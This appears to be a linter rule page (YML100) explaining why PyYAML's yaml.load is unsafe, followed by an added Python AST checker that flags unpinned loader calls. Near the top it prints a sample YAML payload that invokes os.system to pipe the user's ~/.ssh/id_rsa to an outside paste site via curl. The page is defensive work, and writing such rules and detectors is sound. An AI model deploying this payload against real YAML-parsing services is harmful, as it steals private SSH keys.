#YML100

Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

The PyYAML library's default loader will parse YAML like this:

!!python/object/apply:os.system ["cat ~/.ssh/id_rsa | curl -F 'sprunge=<-' http://sprunge.us"]

Using yaml.load against this input would execute local commands on the host shell.

Deprecation in pyyaml 5.1

PyYAML 5.1 and newer emit a warning when yaml.load is called without an explicit loader; however, in many deployments, such as web servers, developers would never see this warning.

Example

import yaml
with open('cfg.yaml') as cfg:
    config = yaml.load(cfg)  # YML100: no Loader given, so the default (unsafe) loader is used

Quick Fixes
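As an added example (not part of the original rule page or the linter's own implementation), the following checker walks a module's AST and reports every yaml.load call that is not pinned to SafeLoader, the same condition YML100 describes. The embedded SAMPLE_SOURCE is constructed for this example: it places the rule's vulnerable call next to the two accepted fixes (yaml.safe_load, or yaml.load with Loader=yaml.SafeLoader). Treating only SafeLoader and CSafeLoader as acceptable is this example's own design choice; the rule text itself only recommends yaml.safe_load().

```python
import ast

# Constructed sample module (not from the page): the vulnerable call from the
# rule's example next to the fixed forms, plus a bare `from yaml import load`.
SAMPLE_SOURCE = """
import yaml
from yaml import load, safe_load

with open("cfg.yaml") as cfg:
    config = yaml.load(cfg)                          # unsafe: default Loader
    backup = load(cfg)                               # unsafe: same call via `from yaml import load`
    full = yaml.load(cfg, Loader=yaml.FullLoader)    # flagged: any Loader other than SafeLoader
    ok1 = yaml.safe_load(cfg)                        # fixed
    ok2 = yaml.load(cfg, Loader=yaml.SafeLoader)     # fixed
    ok3 = safe_load(cfg)                             # fixed
"""

# Loaders this checker accepts (assumption: only the SafeLoader family counts as a fix).
SAFE_LOADERS = {"SafeLoader", "CSafeLoader"}


def _name_of(node):
    """Best-effort name for a Loader expression: yaml.SafeLoader -> 'SafeLoader'."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return ast.dump(node)


def _loader_arg(call):
    """Return the Loader argument (second positional or Loader= keyword), or None."""
    if len(call.args) >= 2:
        return call.args[1]
    for kw in call.keywords:
        if kw.arg == "Loader":
            return kw.value
    return None


def _collect_aliases(tree):
    """Names under which the yaml module and yaml.load are reachable in this module."""
    modules, loads = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name == "yaml":
                    modules.add(alias.asname or "yaml")
        elif isinstance(node, ast.ImportFrom) and node.module == "yaml":
            for alias in node.names:
                if alias.name == "load":
                    loads.add(alias.asname or "load")
    return modules, loads


def _is_yaml_load(func, modules, loads):
    """True for `yaml.load(...)` (under any module alias) or a bare imported `load(...)`."""
    if isinstance(func, ast.Attribute) and func.attr == "load":
        return isinstance(func.value, ast.Name) and func.value.id in modules
    return isinstance(func, ast.Name) and func.id in loads


def find_unsafe_yaml_loads(source):
    """Return [(lineno, message), ...] for every yaml.load call lacking a safe Loader."""
    tree = ast.parse(source)
    modules, loads = _collect_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _is_yaml_load(node.func, modules, loads)):
            continue
        loader = _loader_arg(node)
        if loader is None:
            msg = "YML100: yaml.load() called without a Loader; use yaml.safe_load()"
        elif _name_of(loader) in SAFE_LOADERS:
            continue  # pinned to SafeLoader: arbitrary-object tags are rejected
        else:
            msg = f"YML100: yaml.load() uses {_name_of(loader)}, not SafeLoader; use yaml.safe_load()"
        findings.append((node.lineno, msg))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, msg in find_unsafe_yaml_loads(SAMPLE_SOURCE):
        print(f"line {lineno}: {msg}")
```

Run against SAMPLE_SOURCE the checker reports lines 6, 7 and 8 and stays silent on the three fixed lines. It is a static check on the call site, so it does not need PyYAML installed and it fires whether or not the runtime deprecation warning would ever be seen, which is the gap the rule text points out for web servers.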